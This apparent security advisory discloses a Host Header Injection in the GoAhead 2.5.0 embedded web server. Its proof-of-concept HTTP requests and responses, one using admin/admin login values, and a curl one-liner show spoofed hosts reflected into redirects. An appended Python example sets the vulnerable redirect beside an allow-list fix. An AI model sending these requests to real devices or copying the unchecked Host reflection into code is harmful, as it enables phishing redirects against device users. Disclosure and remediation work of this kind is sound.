      # Vendor Homepage: https://www.embedthis.com/goahead/
      # Affected Version: 2.5.0 may be others.
      # Tested On Version: 2.5.0 in Cisco Switches and Net Gear routers.
      # Vendor Fix: N/A
      # CVE : N/A
      # CVSS v3: N/A
      # Category: Hardware, Web Apps
      # Reference : www.fact-in-hack.blogspot.com

      Vulnerability: Host Header Injection

      A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.

      An issue was discovered in GoAhead web server version 2.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to a potential host header injection attack; the affected hosts can also be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attacks.

      PS: Affects most embedded web servers on hardware such as switches, routers, IoT devices and IP cameras.

      POC: 1

      Request:

      POST /goform/login HTTP/1.1
      Host: myevilwebsite.com
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 46
      Connection: close
      Referer: https://46725846267.com/login.asp
      Upgrade-Insecure-Requests: 1

      username=admin&password=admin&language=english

      Response:

      HTTP/1.0 302 Redirect
      Server: Goahead/2.5.0 PeerSec-MatrixSSL/3.2.1-OPEN
      Date: Fri Jul 12 15:28:29 2019
      Pragma: no-cache
      Cache-Control: no-cache
      Content-Type: text/html

      <html><head></head><body>
      This document has moved to a new <a href="https://myevilwebsite.com/login.asp">location</a>.
      Please update your documents to reflect the new location.
      </body></html>

      POC: 2

      Request:

      POST /config/log_off_page.htm HTTP/1.1
      Host: google.com:443
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: 12344
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 774
      Connection: close
      Upgrade-Insecure-Requests: 1

      restoreUrl=&errorCollector=&ModuleTable=OK&rlPhdModuleTable%24VT=OK&rlPhdModuleStackUnit%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleIndex%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleType%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&rlPhdModuleNumberOfPorts%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&ModuleTable%24endVT=OK&rlPhdModuleStackUnit%24repeat%3F1=1&rlPhdModuleIndex%24repeat%3F1=1&rlPhdModuleType%24repeat%3F1=47&rlPhdModuleNumberOfPorts%24repeat%3F1=28&ModuleTable%24endRepeat%3F1=OK&userName%24query=%24enab15%24&password%24query=admin&x=0&y=0

      Response:

      HTTP/1.1 302 Redirect
      Server: GoAhead-Webs
      Date: Sat Oct 14 19:04:59 2006
      Connection: close
      Pragma: no-cache
      Cache-Control: no-cache
      Content-Type: text/html
      Location: http://google.com:443/config/accessnotallowedpage.htm

      <html><head></head><body>
      This document has moved to a new <a href="http://google.com:443/config/accessnotallowedpage.htm">location</a>.
      Please update your documents to reflect the new location.
      </body></html>

      POC: 3

      curl -k --header "Host: attacker domain" "victim's url"

      Initial Investigation: The potentially affected part of the GoAhead web server source code is in the 'http.c' file, which contains the 'host' parameter.
      https://github.com/embedthis/goahead/blob/master/src/http.c
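Both 302 responses above build their Location (and the link in the body) from whatever the client sent as Host. The following is an added example, not GoAhead's http.c: that redirect construction beside a form that only reflects a Host the device is configured to answer to, falling back to its canonical name otherwise. The allow-list and canonical host name are assumed deployment settings.

```python
"""Added example (not GoAhead code): reflect Host into a redirect only after
checking it against the names this server is configured to answer to."""
from urllib.parse import urlsplit

# Assumed deployment configuration for the device.
ALLOWED_HOSTS = {"switch01.corp.example", "192.168.1.1"}
CANONICAL_HOST = "switch01.corp.example"


def redirect_vulnerable(host_header: str, target_path: str) -> str:
    """What the 302 responses above show: the client-supplied Host is copied into Location."""
    return f"http://{host_header}{target_path}"


def normalise_host(host_header: str):
    """Return the lower-cased host name from a Host header value, or None when the
    value is empty or is not a bare host[:port] token (path, userinfo, spaces, ...)."""
    if not host_header or any(c.isspace() for c in host_header):
        return None
    if any(ch in host_header for ch in "/@?#"):
        return None
    # A leading // makes urlsplit parse the value as an authority; it strips the port
    # and the brackets of an IPv6 literal for us.
    parts = urlsplit("//" + host_header)
    return parts.hostname.lower() if parts.hostname else None


def redirect_fixed(host_header: str, target_path: str) -> str:
    """Reflect Host only when it names this device; otherwise use the configured name.
    (A path-only Location such as '/login.asp' avoids the problem entirely; RFC 7231
    permits a relative reference there.)"""
    host = normalise_host(host_header)
    if host is None or host not in ALLOWED_HOSTS:
        return f"http://{CANONICAL_HOST}{target_path}"
    return f"http://{host_header}{target_path}"


if __name__ == "__main__":
    for hdr in ("myevilwebsite.com", "google.com:443", "switch01.corp.example"):
        print(hdr, "->", redirect_vulnerable(hdr, "/login.asp"), "|", redirect_fixed(hdr, "/login.asp"))
```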